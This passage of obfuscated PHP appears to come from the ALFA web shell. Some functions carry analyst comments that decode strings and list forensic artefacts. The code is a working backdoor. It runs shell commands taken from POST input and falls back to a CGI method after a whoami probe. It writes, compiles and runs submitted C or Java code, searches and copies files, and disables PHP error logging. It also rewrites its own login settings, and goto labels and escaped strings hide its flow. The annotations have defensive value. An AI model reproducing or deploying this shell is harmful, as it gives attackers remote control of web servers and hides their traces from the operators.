x45\x78\145\143\x75\x74\145\x22\x20\164\x79\160\x65\75\x22\163\165\x62\155\151\x74\42\76\x3c\x62\x72\76\74\57\x66\157\x72\155\76\xa\x3c\150\x72\76\x3c\160\x72\x65\76"; if (isset($_POST["\x63\157\155\155\141\x6e\144\137\x73\157\154\x65\x76\x69\x73\151\142\154\145"])) { if (strtolower(substr(PHP_OS, 0, 3)) == "\167\151\x6e") { $separator = "\46"; } else { $separator = "\73"; } $solevisible = "\143\144\40\47" . addslashes(str_replace("\x5c", "\57", @alfaGetCwd())) . "\47" . $separator . '' . __ZGVjb2Rlcg($_POST["\x63\157\x6d\155\141\x6e\144\x5f\x73\157\x6c\x65\x76\151\x73\151\142\154\145"]); echo alfaEx($solevisible); } echo "\74\x2f\160\162\x65\76\12\74\57\x62\x6f\144\x79\76\74\x2f\x68\x74\155\154\76"; die; } goto nhViU; BXSlk: @set_time_limit(0); goto Os8cj; pQYlh: function Alfa_StrSearcher($dir, $string, $ext, $e, $arr = array()) { if (@is_dir($dir)) { $files = @scandir($dir); foreach ($files as $key => $value) { $path = @realpath($dir . DIRECTORY_SEPARATOR . $value); if (!@is_dir($path)) { if ($ext != "\x2a") { $f = basename($path); $f = explode("\56", $f); $f = end($f); if ($f != $ext) { continue; } } if ($e == "\x73\164\162") { $content = @file_get_contents($path); if (strpos($content, $string) !== false) { echo str_replace("\x5c", "\57", $path) . "\x3c\142\x72\76"; } } else { if (strstr($value, $string)) { echo str_replace("\134", "\57", $path) . 
"\74\x62\x72\76"; } } $results[] = $path; } elseif ($value != "\x2e" && $value != "\x2e\56") {
    // Remainder of Alfa_StrSearcher (its header is on the preceding line): the string above
    // decodes to "<br>", and this branch recurses into every directory entry except "." and "..".
    Alfa_StrSearcher($path, $string, $ext, $e, $results); $results[] = $path; } } } }
// Analyst note: the label/goto pairs between definitions are control-flow obfuscation; they only
// order the top-level statements. The escaped string literals are decoded in the comments below.
goto zHgw5;
/**
 * Command-execution wrapper: runs $in through _alfa_php_cmd() and, under the conditions
 * below, retries through _alfa_cgicmd(). Both helpers are defined outside this excerpt, so
 * what they actually invoke cannot be confirmed from here.
 *
 * @param mixed $in  Command string; callers visible on this page pass "gcc ...", "javac ...", "java ..."
 *                   and a "cd '<cwd>'" prefix joined to a decoded POST value.
 * @param mixed $re  Passed through unchanged as the second argument of _alfa_php_cmd().
 * @param mixed $cgi When truthy, an empty first result permits the fallback.
 * @param mixed $all When truthy, the fallback is attempted even if the first call produced output.
 * @return mixed A non-empty _alfa_cgicmd() result when the fallback ran, otherwise the _alfa_php_cmd() result.
 */
HL3qe: function alfaEx($in, $re = false, $cgi = true, $all = false) {
    $data = _alfa_php_cmd($in, $re);
    // Precedence: (empty($data) && $cgi) || $all.
    if (empty($data) && $cgi || $all) {
        // $GLOBALS["sys"] == "unix"
        if ($GLOBALS["\x73\x79\x73"] == "\x75\156\x69\x78") {
            // Probe with "whoami": zero-length output is treated as "the first method does not work".
            if (strlen(_alfa_php_cmd("\x77\x68\x6f\141\x6d\151")) == 0 || $all) {
                $cmd = _alfa_cgicmd($in);
                if (!empty($cmd)) {
                    return $cmd;
                }
            }
        }
    }
    return $data;
}
goto KtNd0;
// ini_set("log_errors", 0): switches PHP error logging off, with "@" hiding any failure.
// For responders this means the PHP error log may hold no trace of this script's activity.
rUSPf: @ini_set("\154\157\147\137\145\162\x72\x6f\x72\x73", 0);
goto CrZw0;
/**
 * Stores a value in $_COOKIE for the current request and sends it as a cookie.
 *
 * @param mixed $key   Cookie name.
 * @param mixed $value Cookie value.
 */
oMz56: function __alfa_set_cookie($key, $value) {
    $_COOKIE[$key] = $value;
    // Expiry is now + 7 days, path is "/"; no further setcookie() arguments are passed.
    @setcookie($key, $value, time() + 86400 * 7, "\57");
}
goto hId6W;
/**
 * Echoes $s between "<center>" and "</center>", preceded by the opening tag returned by __pre().
 * $s is written to the response without any escaping.
 *
 * @param mixed $s Markup or text to print.
 */
qr6DC: function __alert($s) {
    echo "\x3c\143\145\156\x74\145\x72\76" . __pre() . $s . "\74\57\143\x65\x6e\164\x65\162\76";
}
goto Wo4n0;
// When $GLOBALS["sys"] == "win": rewrite backslashes to "/" in $GLOBALS["home_cwd"] and $GLOBALS["cwd"].
HVzUJ: if ($GLOBALS["\x73\171\x73"] == "\x77\151\156") {
    $GLOBALS["\x68\157\x6d\145\137\x63\167\x64"] = str_replace("\134", "\x2f", $GLOBALS["\x68\x6f\x6d\145\x5f\x63\167\144"]);
    $GLOBALS["\143\x77\x64"] = str_replace("\x5c", "\57", $GLOBALS["\x63\x77\x64"]);
}
goto FN_bJ;
/**
 * Writes caller-supplied source code into ALFA_TEMPDIR, compiles it with gcc or javac via
 * alfaEx(), runs the result via alfaEx(), then deletes the source and the compiled file.
 * The return values of the alfaEx() calls are discarded; only a status banner is returned.
 *
 * Artefacts a defender can look for (all derived from the code below):
 *  - C path: "c" + first 8 hex chars of md5(time()) + ".c", plus that name with ".out"
 *    (or ".exe" when $GLOBALS["sys"] == "win") appended;
 *  - Java path: "<name>.java" / "<name>.class", where <name> is taken from the submitted code
 *    or is "java" + 8 hex chars;
 *  - gcc / javac / java started by the PHP or web-server process (assuming alfaEx() spawns
 *    processes, which depends on helpers not shown here);
 *  - the files exist only briefly, because both are unlink()ed before returning.
 *
 * @param mixed $evalType      "c" or "java"; any other value returns false.
 * @param mixed $evalCode      Source text written to disk unmodified (Java code without a class
 *                             declaration is wrapped in one).
 * @param mixed $evalOptions   Extra compiler options, concatenated into the command line.
 * @param mixed $evalArguments Arguments appended to the run command.
 * @return string|false Success or failure banner (HTML), or false for an unknown $evalType.
 */
zUXll: function bcinit($evalType, $evalCode, $evalOptions, $evalArguments) {
    // "<font color='green'>[ Success...! ]</font>"
    $res = "\74\x66\x6f\x6e\x74\x20\x63\157\154\x6f\162\x3d\x27\147\162\x65\145\x6e\47\76\x5b\40\123\165\143\x63\x65\163\x73\56\56\56\41\40\135\x3c\x2f\x66\x6f\156\164\76";
    // "<font color='red'>[ Failed...! ]</font>"
    $err = "\x3c\x66\157\156\164\40\x63\157\154\x6f\x72\75\47\162\x65\x64\47\x3e\x5b\40\106\141\x69\154\x65\x64\x2e\x2e\56\41\x20\135\74\x2f\x66\x6f\x6e\x74\x3e";
    // Pad options with a trailing space and arguments with a leading space for concatenation.
    if ($evalOptions != '') {
        $evalOptions = $evalOptions . "\x20";
    }
    if ($evalArguments != '') {
        $evalArguments = "\40" . $evalArguments;
    }
    // $evalType == "c"
    if ($evalType == "\x63") {
        $tmpdir = ALFA_TEMPDIR;
        // The chdir() result is not checked; later paths are relative to whatever the cwd is.
        chdir($tmpdir);
        // If the directory is not writable nothing runs, yet the success banner is still returned.
        if (is_writable($tmpdir)) {
            // File name is derived from the current Unix second, so it correlates with file timestamps.
            $uniq = substr(md5(time()), 0, 8);
            // ".c"
            $filename = $evalType . $uniq . "\56\x63";
            $path = $filename;
            if (__write_file($path, $evalCode)) {
                // ".exe" on "win", otherwise ".out"
                $ext = $GLOBALS["\163\x79\163"] == "\167\151\x6e" ? "\x2e\x65\x78\145" : "\56\x6f\165\x74";
                $pathres = $filename . $ext;
                // "-o " . <output> . " " . <options>
                $evalOptions = "\x2d\157\x20" . $pathres . "\x20" . $evalOptions;
                // "gcc " . <options> . <source>
                $cmd = "\x67\143\x63\40" . $evalOptions . $path;
                alfaEx($cmd);
                if (is_file($pathres)) {
                    // 493 decimal is mode 0755.
                    if (chmod($pathres, 493)) {
                        $cmd = $pathres . $evalArguments;
                        alfaEx($cmd);
                    } else {
                        $res = $err;
                    }
                    unlink($pathres);
                } else {
                    $res = $err;
                }
                unlink($path);
            } else {
                $res = $err;
            }
        }
        return $res;
    // $evalType == "java"
    } elseif ($evalType == "\x6a\141\x76\x61") {
        $tmpdir = ALFA_TEMPDIR;
        chdir($tmpdir);
        if (is_writable($tmpdir)) {
            // Pattern decodes to: /class\ ([^{]+){/i  -- the captured class name becomes the file
            // name and is later concatenated, unquoted, into the "java" command line.
            if (preg_match("\57\x63\154\141\163\x73\134\40\50\133\x5e\x7b\x5d\x2b\x29\173\x2f\x69", $evalCode, $r)) {
                $classname = trim($r[1]);
                $filename = $classname;
            } else {
                $uniq = substr(md5(time()), 0, 8);
                $filename = $evalType . $uniq;
                // "class " . <name> . " { " . <code> . " } "
                $evalCode = "\x63\154\141\163\163\40" . $filename . "\40\x7b\40" . $evalCode . "\x20\175\x20";
            }
            // ".java"
            $path = $filename . "\x2e\x6a\x61\166\x61";
            if (__write_file($path, $evalCode)) {
                // "javac " . <options> . <source>
                $cmd = "\x6a\x61\x76\x61\143\40" . $evalOptions . $path;
                alfaEx($cmd);
                // ".class"
                $pathres = $filename . "\x2e\x63\154\x61\163\163";
                if (is_file($pathres)) {
                    if (chmod($pathres, 493)) {
                        // "java " . <name> . <arguments>
                        $cmd = "\x6a\141\x76\x61\40" . $filename . $evalArguments;
                        alfaEx($cmd);
                    } else {
                        $res = $err;
                    }
                    unlink($pathres);
                } else {
                    $res = $err;
                }
                unlink($path);
            } else {
                $res = $err;
            }
        }
        return $res;
    }
    return false;
}
goto PnxkJ;
/**
 * Prints a status banner: for $c == 0, "<center><font color='green'>Success</font> --> path: {$p}</center>",
 * otherwise "<center><font color="red">Error in inject code !</font></center>".
 * $p is interpolated into the HTML without escaping.
 *
 * @param mixed $c Status code; 0 selects the success banner (loose comparison).
 * @param mixed $p Path shown in the success banner.
 */
wK3Iv: function hijackOutput($c = 0, $p = '') {
    echo $c == 0 ? "\74\x63\145\156\164\x65\x72\x3e\x3c\x66\x6f\x6e\x74\x20\143\157\154\x6f\x72\x3d\47\x67\x72\145\x65\156\x27\76\123\165\x63\x63\145\163\x73\74\57\x66\157\156\x74\76\40\x2d\55\76\40\x70\141\164\150\x3a\40{$p}\74\x2f\143\145\156\x74\145\x72\76" : "\x3c\143\x65\156\164\x65\162\76\x3c\146\x6f\156\x74\40\143\157\x6c\x6f\x72\x3d\42\x72\x65\144\42\x3e\105\x72\162\157\162\x20\x69\156\x20\x69\x6e\x6a\x65\143\164\x20\x63\x6f\144\x65\40\x21\x3c\57\146\x6f\x6e\164\76\x3c\x2f\x63\x65\x6e\164\145\x72\76";
}
goto pQYlh;
// copy_paste() starts here and continues on the following line of the listing.
eiihp: function copy_paste($c, $s, $d) { if (@is_dir($c . $s)) { @mkdir($d . 
$s); $h = @opendir($c . $s); while (($f = @readdir($h)) !== false) { if ($f != "\x2e" and $f != "\56\x2e") { copy_paste($c . $s . "\57", $f, $d . $s . "\x2f"); } } } elseif (is_file($c . $s)) { @copy($c . $s, $d . $s); } } goto tWrGE; TWvKj: function alfaSettings() { alfahead(); AlfaNum(6, 7, 8, 9, 10); echo "\74\144\151\166\x20\143\154\x61\163\x73\75\150\145\x61\144\x65\x72\x3e\x3c\143\145\x6e\164\x65\x72\76\74\160\x3e\x3c\144\x69\166\40\x63\x6c\x61\x73\x73\75\42\x74\170\x74\146\x6f\156\164\x5f\150\x65\x61\144\x65\162\x22\76\174\x20\x53\145\x74\x74\x69\156\x67\x73\x20\174\74\x2f\144\x69\x76\76\74\x2f\x70\76\x3c\150\63\x3e\x3c\x61\40\150\162\145\146\75\x6a\x61\166\x61\x73\x63\x72\151\x70\164\72\x76\157\151\x64\50\60\51\x20\x6f\x6e\x63\x6c\x69\143\x6b\x3d\42\x67\50\47\x73\145\x74\x74\151\156\147\x73\47\54\x6e\165\x6c\x6c\x2c\x6e\x75\154\x6c\54\x6e\x75\154\x6c\x2c\x6e\165\154\154\54\156\x75\154\x6c\54\x6e\x75\154\x6c\x2c\156\165\154\154\x2c\x6e\165\x6c\x6c\x2c\x27\x6d\141\x69\x6e\47\51\42\x3e\x7c\x20\x47\145\x6e\x65\162\x61\x6c\154\40\123\145\x74\x74\x69\156\x67\40\x7c\x20\x3c\57\x61\76\74\x2f\x68\63\x3e\x3c\57\x63\145\x6e\x74\145\x72\76"; if ($_POST["\141\x6c\146\141\70"] == "\x6d\x61\x69\x6e") { echo "\74\160\x3e\74\143\145\x6e\164\x65\x72\76\x3c\144\x69\x76\x20\x63\154\141\x73\x73\75\42\x74\x78\x74\146\x6f\x6e\x74\137\x68\x65\141\144\x65\162\42\76\174\x20\123\x65\164\x74\151\156\x67\163\x20\174\74\x2f\x64\x69\x76\76\74\57\x70\76\74\x66\157\x72\155\x20\x6f\x6e\123\165\x62\x6d\151\164\75\x22\x72\145\154\x6f\x61\x64\x53\x65\x74\x74\151\x6e\147\x28\x74\x68\x69\163\x29\x3b\162\x65\164\x75\x72\156\40\146\x61\154\x73\x65\73\x22\x20\x6d\145\164\x68\157\x64\75\47\160\157\163\164\47\76"; $lg_array = array("\x30" => "\116\157", "\61" => "\131\145\163"); $penc_array = array("\146\x61\154\163\145" => "\116\157", "\164\162\x75\x65" => "\131\145\x73"); $protect_html = ''; $icon_html = ''; $postEnc_html = ''; $login_html = ''; $cgiapi_html = ''; foreach ($lg_array as $key => 
$val) { $protect_html .= "\74\157\160\x74\151\157\x6e\40\x76\141\154\x75\145\75\42" . $key . "\x22\40" . ($GLOBALS["\104\102\x5f\x4e\101\115\105"]["\x73\x61\146\x65\x6d\x6f\x64\x65"] == "\x31" ? "\163\x65\154\145\143\164\145\x64" : '') . "\76" . $val . "\74\x2f\157\160\x74\151\157\x6e\x3e"; } foreach ($lg_array as $key => $val) { $icon_html .= "\x3c\x6f\x70\164\x69\x6f\x6e\x20\x76\141\154\165\145\x3d\x22" . $key . "\42\40" . ($GLOBALS["\x44\102\137\x4e\x41\x4d\105"]["\163\150\x6f\167\x5f\x69\143\157\156\163"] == "\61" ? "\163\145\154\x65\143\x74\145\x64" : '') . "\x3e" . $val . "\74\57\x6f\160\164\151\157\156\x3e"; } foreach ($penc_array as $key => $val) { $cgiapi_html .= "\x3c\157\160\164\151\x6f\156\40\x76\141\x6c\x75\x65\x3d\42" . $key . "\x22\40" . (!empty($_POST["\x61\154\x66\141\71"]) && $_POST["\x61\154\x66\141\x39"] == $key ? "\x73\x65\154\145\143\x74\145\x64" : ($GLOBALS["\x44\x42\x5f\116\x41\x4d\105"]["\x63\x67\x69\x5f\141\160\x69"] && empty($_POST["\141\154\146\x61\x39"]) ? "\x73\145\154\145\x63\164\145\x64" : '')) . "\x3e" . $val . "\x3c\x2f\157\x70\164\151\x6f\156\76"; } foreach ($penc_array as $key => $val) { $postEnc_html .= "\x3c\x6f\160\164\151\x6f\x6e\x20\166\x61\154\x75\x65\75\x22" . $key . "\x22\x20" . (!empty($_POST["\141\x6c\x66\141\x37"]) && $_POST["\x61\x6c\x66\141\x37"] == $key ? "\163\x65\x6c\145\x63\164\x65\x64" : (__ALFA_POST_ENCRYPTION__ && empty($_POST["\x61\x6c\146\141\67"]) ? "\x73\x65\x6c\145\143\164\x65\x64" : '')) . "\x3e" . $val . "\74\57\157\x70\x74\x69\157\x6e\76"; } $lg_array = array("\x67\165\151" => "\x47\125\111", "\65\x30\60" => "\x35\x30\60\x20\111\156\164\145\162\156\141\x6c\40\123\145\x72\166\x65\x72\40\105\x72\x72\x6f\162", "\x34\x30\63" => "\x34\60\x33\40\x46\157\162\142\x69\x64\x64\145\156", "\64\x30\x34" => "\x34\x30\64\40\x4e\157\x74\106\x6f\x75\x6e\x64"); foreach ($lg_array as $key => $val) { $login_html .= "\x3c\x6f\x70\x74\151\157\x6e\x20\x76\x61\x6c\x75\x65\x3d\42" . $key . "\x22\40" . 
($GLOBALS["\104\102\137\116\101\115\105"]["\x6c\x6f\147\x69\x6e\137\160\x61\x67\x65"] == $key ? "\x73\x65\154\145\x63\x74\x65\144" : '') . "\x3e" . $val . "\x3c\x2f\x6f\160\x74\x69\x6f\156\x3e"; } echo ''; echo "\x3c\164\x61\142\154\145\x20\142\157\x72\x64\145\x72\x3d\42\x31\42\x3e\74\x74\142\157\x64\171\76\x3c\x74\162\x3e\x3c\x74\144\x3e\x3c\144\151\x76\x20\143\x6c\141\163\163\x3d\42\164\142\x6c\164\x78\164\42\40\x73\x74\171\154\x65\x3d\x22\x63\157\154\157\x72\72\x23\106\106\106\x46\106\106\x22\x3e\120\x72\157\x74\145\143\x74\72\x3c\57\144\x69\x76\76\x3c\x2f\164\144\x3e\x3c\x74\144\76\74\x73\x65\x6c\145\x63\164\40\x6e\x61\x6d\x65\75\x22\160\162\x6f\x74\x65\143\x74\42\x20\163\x74\171\x6c\145\75\x22\167\151\x64\x74\150\x3a\61\60\60\45\x3b\42\76" . $protect_html . "\74\57\163\x65\x6c\145\143\164\x3e\74\x2f\x74\144\76\x3c\57\164\x72\x3e\74\x74\162\x3e\x3c\x74\x64\76\74\144\x69\166\x20\143\154\141\x73\163\x3d\x22\164\142\x6c\x74\170\164\42\40\x73\164\x79\x6c\x65\x3d\42\143\x6f\x6c\157\162\x3a\x23\106\106\x46\x46\x46\106\42\76\103\x67\x69\x20\101\160\151\x3a\74\57\x64\151\166\x3e\74\57\x74\144\x3e\74\x74\x64\x3e\x3c\x73\x65\154\x65\x63\x74\x20\156\x61\x6d\145\75\x22\x63\x67\151\137\141\160\x69\x22\40\x73\x74\171\x6c\x65\75\42\167\x69\144\164\x68\x3a\x31\60\x30\45\x3b\x22\x3e" . $cgiapi_html . "\x3c\x2f\x73\145\x6c\145\x63\x74\x3e\74\x2f\164\144\x3e\74\x2f\164\x72\x3e\74\x74\x72\x3e\74\164\144\x3e\x3c\x64\x69\166\40\143\154\x61\x73\163\75\42\x74\x62\x6c\164\170\x74\42\40\x73\x74\171\154\145\x3d\42\143\157\154\157\x72\72\x23\x46\106\106\x46\106\106\42\76\x50\157\163\164\x20\x45\156\143\x72\171\x70\164\x69\157\x6e\x3a\74\57\x64\x69\166\76\x3c\57\x74\x64\x3e\x3c\x74\144\x3e\x3c\163\x65\154\145\143\164\40\156\x61\155\145\75\42\x70\x6f\163\x74\137\x65\x6e\143\x72\171\160\164\42\40\x73\164\171\x6c\145\75\x22\167\x69\144\x74\150\x3a\x31\x30\60\45\73\42\76" . $postEnc_html . 
"\74\x2f\163\x65\154\145\143\x74\x3e\74\57\x74\x64\x3e\74\x2f\x74\162\x3e\x3c\164\162\x3e\74\x74\144\76\74\144\x69\x76\x20\x63\154\x61\x73\163\75\42\164\x62\x6c\164\x78\164\x22\x20\163\x74\171\154\x65\75\42\x63\157\154\157\x72\x3a\x23\106\x46\106\x46\x46\106\42\76\x53\x68\x6f\x77\x20\x49\143\157\156\163\x3a\x3c\57\x64\x69\x76\x3e\74\57\164\x64\x3e\74\164\144\76\x3c\163\x65\154\x65\x63\x74\x20\x6e\141\155\145\x3d\42\x69\x63\x6f\156\x22\40\163\x74\x79\x6c\145\75\x22\167\x69\144\x74\x68\72\x31\60\60\45\x3b\x22\x3e" . $icon_html . "\x3c\x2f\x73\145\x6c\145\x63\x74\76\x3c\57\x74\x64\76\74\57\164\162\x3e\74\164\162\x3e\x3c\164\x72\x3e\74\164\x64\x3e\74\x64\x69\166\40\x63\154\x61\163\x73\75\x22\x74\142\x6c\x74\170\x74\42\40\163\164\x79\x6c\145\x3d\42\143\x6f\x6c\157\x72\72\43\106\x46\x46\x46\x46\106\42\x3e\154\x6f\147\151\x6e\40\120\x61\147\x65\x3a\74\x2f\144\151\x76\76\x3c\57\x74\144\76\74\164\x64\76\x3c\x73\x65\x6c\145\x63\164\40\x73\164\x79\x6c\145\75\42\x77\151\144\164\x68\72\61\x30\x30\45\x3b\42\40\x6e\x61\155\145\75\42\154\x67\160\x61\x67\x65\42\76" . $login_html . "\x3c\x2f\x73\145\154\x65\x63\x74\x3e\74\57\164\x64\76\x3c\57\x74\162\76\x3c\x74\162\76\74\164\x64\x3e\74\144\x69\x76\40\143\x6c\x61\x73\163\75\42\164\x62\x6c\164\170\164\42\x20\163\x74\x79\154\x65\75\x22\x63\157\x6c\x6f\162\72\43\106\x46\106\106\x46\x46\42\x3e\x55\163\145\x72\116\x61\155\145\72\x3c\57\144\151\x76\76\74\57\164\144\76\74\164\144\76\74\x69\156\160\165\164\40\164\171\160\x65\75\42\164\145\x78\x74\42\x20\163\164\x79\154\x65\75\x22\167\x69\144\x74\x68\x3a\x39\x35\45\x3b\x22\x20\x6e\x61\x6d\145\75\42\165\163\145\x72\156\x61\x6d\145\x22\x20\166\x61\154\165\145\x3d\42" . (empty($_POST["\x61\x6c\146\x61\63"]) ? $GLOBALS["\104\x42\x5f\x4e\101\x4d\105"]["\165\163\x65\162"] : $_POST["\141\x6c\x66\141\63"]) . 
"\x22\40\x70\154\x61\x63\x65\x68\157\154\144\x65\162\x3d\x22\x73\x6f\x6c\x65\x76\151\163\x69\x62\154\x65\42\76\x3c\57\164\144\76\74\x2f\x74\162\76\x3c\x74\x72\76\x3c\164\144\76\74\x64\151\166\x20\143\x6c\x61\x73\x73\x3d\42\164\x62\154\x74\x78\164\x22\40\x73\164\x79\154\x65\x3d\x22\x63\x6f\154\157\162\x3a\x23\x46\106\106\x46\106\x46\x22\76\120\141\163\x73\167\157\162\144\72\74\57\144\x69\166\x3e\74\57\164\144\x3e\x3c\164\144\x3e\x3c\x69\156\x70\165\x74\x20\x74\171\x70\145\x3d\42\164\145\170\164\42\x20\x73\164\x79\x6c\145\75\x22\167\151\x64\164\x68\x3a\x39\x35\x25\x3b\x22\40\156\141\155\x65\75\42\x70\x61\163\163\167\x6f\x72\144\42\x20\160\x6c\x61\x63\x65\x68\x6f\154\x64\145\x72\75\x22\x2a\52\52\x2a\x2a\42\x3e\x3c\57\x74\x64\x3e\74\x2f\164\162\76\74\57\x74\x62\x6f\144\171\x3e\x3c\57\164\x61\142\154\x65\x3e\74\x69\156\160\x75\x74\40\x74\171\x70\145\x3d\x22\x68\x69\x64\144\145\156\x22\x20\156\141\155\x65\75\x22\x65\42\40\x76\x61\x6c\x75\x65\75\42" . $GLOBALS["\x44\102\x5f\116\x41\115\x45"]["\163\x61\x66\x65\155\157\x64\145"] . "\x22\76\74\151\156\160\165\164\40\x74\x79\160\x65\75\42\150\x69\144\x64\x65\x6e\x22\x20\x6e\x61\155\145\75\x22\163\42\x20\166\141\154\x75\145\75\42" . $GLOBALS["\x44\x42\137\116\x41\x4d\x45"]["\163\150\157\x77\137\x69\143\157\156\163"] . 
"\x22\x3e\74\160\x3e\x3c\x69\156\160\165\164\x20\164\171\160\145\x3d\42\x73\165\142\x6d\151\x74\x22\x20\156\141\155\145\x3d\x22\142\164\x6e\42\40\166\141\154\x75\145\75\x22\x20\x22\76\74\x2f\160\x3e\x3c\x2f\146\157\162\x6d\76\74\x2f\x63\145\156\x74\145\162\x3e"; if ($_POST["\x61\154\146\x61\65"] == "\x3e\76") { echo __pre(); if (!empty($_POST["\141\x6c\146\141\x33"])) { $protect = $_POST["\x61\x6c\146\141\61"]; $lgpage = $_POST["\x61\154\x66\141\x32"]; $username = $_POST["\x61\x6c\x66\x61\x33"]; $password = md5($_POST["\141\154\146\141\x34"]); $icon = $_POST["\141\154\146\141\66"]; $post_encrypt = $_POST["\x61\x6c\x66\141\67"]; $cgi_api_val = $_POST["\141\154\x66\x61\71"]; @chdir($GLOBALS["\x68\157\155\x65\x5f\x63\167\144"]); $basename = @basename($_SERVER["\120\110\120\137\123\105\114\106"]); $data = @file_get_contents($basename); $user_rand = $GLOBALS["\104\x42\x5f\x4e\x41\x4d\105"]["\165\163\x65\x72\x5f\162\141\x6e\x64"]; $pass_rand = $GLOBALS["\104\102\x5f\x4e\x41\x4d\x45"]["\160\x61\163\x73\137\x72\x61\x6e\x64"]; $login_page_rand = $GLOBALS["\x44\x42\137\x4e\x41\115\x45"]["\154\157\x67\151\156\x5f\x70\x61\x67\x65\137\x72\141\156\144"]; $safemode_rand = $GLOBALS["\104\102\x5f\116\x41\x4d\x45"]["\163\141\146\x65\155\157\x64\x65\137\x72\141\156\x64"]; $show_icons_rand = $GLOBALS["\104\102\137\x4e\101\115\105"]["\163\x68\x6f\x77\x5f\151\143\x6f\x6e\163\x5f\x72\x61\156\144"]; $post_encryption_rand = $GLOBALS["\x44\102\x5f\116\x41\x4d\x45"]["\x70\x6f\x73\164\x5f\145\156\x63\x72\x79\x70\164\151\x6f\x6e\137\x72\141\x6e\x64"]; $cgi_api_rand = $GLOBALS["\x44\x42\137\116\101\115\105"]["\143\x67\151\137\141\160\x69\137\162\141\x6e\144"]; $find_user = "\x2f\x27" . $user_rand . "\47\x28\56\52\x3f\51\x2c\x2f\x69"; $find_pw = "\x2f\47" . $pass_rand . "\x27\x28\x2e\52\77\51\x2c\x2f\x69"; $find_lg = "\x2f\47" . $login_page_rand . "\47\x28\x2e\52\77\x29\x2c\x2f\151"; $find_p = "\x2f\x27" . $safemode_rand . "\x27\50\56\x2a\x3f\51\x2c\57\x69"; $icons = "\57\47" . 
$show_icons_rand . "\47\x28\56\x2a\77\51\x2c\57\x69"; $postEnc = "\x2f\x27" . $post_encryption_rand . "\x27\x28\56\x2a\x3f\51\54\57\151"; $cgi_api_reg = "\57\47" . $cgi_api_rand . "\x27\50\56\52\77\51\x2c\x2f\151"; if (!empty($username) && preg_match($find_user, $data, $e)) { $new = "\x27" . $user_rand . "\x27\40\75\76\x20\x27" . $username . "\47\54"; $data = str_replace($e[0], $new, $data); } if (!empty($_POST["\x61\x6c\146\141\64"]) && preg_match($find_pw, $data, $e)) { $new = "\47" . $pass_rand . "\47\40\x3d\x3e\40\47" . $password . "\x27\54"; $data = str_replace($e[0], $new, $data); } if (!empty($lgpage) && preg_match($find_lg, $data, $e)) { $new = "\47" . $login_page_rand . "\47\x20\x3d\76\x20\x27" . $lgpage . "\x27\54"; $data = str_replace($e[0], $new, $data); } if (!empty($find_p) && preg_match($find_p, $data, $e)) { $new = "\47" . $safemode_rand . "\x27\40\75\76\x20\x27" . $protect . "\x27\54"; $data = str_replace($e[0], $new, $data); } if (preg_match($icons, $data, $e)) { $new = "\47" . $show_icons_rand . "\x27\40\x3d\76\x20\47" . $icon . "\x27\54"; $data = str_replace($e[0], $new, $data); } if (preg_match($postEnc, $data, $e)) { $new = "\47" . $post_encryption_rand . "\x27\40\x3d\x3e\x20" . $post_encrypt . "\54"; $data = str_replace($e[0], $new, $data); } if (preg_match($cgi_api_reg, $data, $e)) { $new = "\x27" . $cgi_api_rand . "\x27\x20\x3d\76\x20" . $cgi_api_val . "\x2c"; $data = str_replace($e[0], $new, $data); } if (@file_put_contents($basename, $data)) { echo "\x3c\x62\x3e\125\163\x65\162\116\141\x6d\x65\x3a\40\x3c\x2f\x62\x3e\74\146\x6f\156\164\x20\x63\x6f\x6c\x6f\162\x3d\42\x67\x72\x65\145\x6e\x22\x3e\x3c\142\x3e" . $username . "\74\57\x62\x3e\74\57\x66\x6f\156\164\76\74\x62\x72\x20\x2f\76\74\x62\76\x50\141\x73\x73\x77\157\162\144\72\40\x3c\x2f\x62\76\74\146\x6f\156\164\x20\143\x6f\x6c\x6f\x72\75\x22\x67\162\145\x65\x6e\42\76\x3c\142\x3e" . $_POST["\x61\154\x66\x61\x34"] . 
"\x3c\x2f\142\x3e\74\57\x66\x6f\156\164\x3e\74\x73\143\162\x69\160\164\x3e\x70\157\x73\164\x5f\x65\x6e\143\x72\171\x70\x74\151\x6f\x6e\137\155\x6f\144\145\40\75\40" . $post_encrypt . "\73\x3c\x2f\x73\x63\x72\151\160\164\x3e"; } else { __alert("\x3c\x73\x70\x61\x6e\x20\x73\164\171\154\145\x3d\x27\143\157\154\x6f\x72\72\162\x65\144\x3b\47\76\x46\x69\154\x65\40\x68\141\x73\40\x6e\157\x20\145\144\151\164\x20\x61\x63\143\145\x73\163\x2e\x2e\56\x21\74\x2f\x73\160\141\156\76"); } } else { __alert("\74\163\160\141\156\x20\x73\x74\171\154\145\x3d\x27\143\x6f\154\157\162\x3a\x72\145\x64\73\47\x3e\125\x73\145\x72\116\x61\x6d\145\40\151\163\40\x45\155\160\164\x79\40\x21\74\57\x73\x70\x61\156\x3e"); } } } elseif ($_POST["\x61\x6c\x66\141\70"] == "\143\157\154\x6f\162") { echo "\74\x63\145\x6e\x74\x65\x72\76\74\x70\x3e\74\144\151\x76\40\143\154\x61\163\163\75\42\164\170\164\x66\x6f\x6e\164\137\x68\145\x61\144\145\x72\42\76\x7c\x20\103\165\163\164\x6f\x6d\40\103\x6f\x6c\157\162\40\174\74\57\144\x69\x76\76\x3c\57\x70\76\74\146\157\162\x6d\x20\x6f\156\123\x75\142\x6d\x69\x74\x3d\42\162\145\x6c\x6f\x61\x64\x43\157\154\157\x72\x73\50\x29\73\162\145\164\165\x72\156\x20\x66\141\154\x73\x65\x3b\42\x20\x6d\145\x74\x68\157\x64\x3d\47\160\157\x73\x74\x27\x3e"; echo "\x3c\x74\141\x62\x6c\x65\40\142\157\x72\x64\145\x72\75\x22\61\x22\x3e\x3c\x74\x62\x6f\144\x79\76"; $template = 
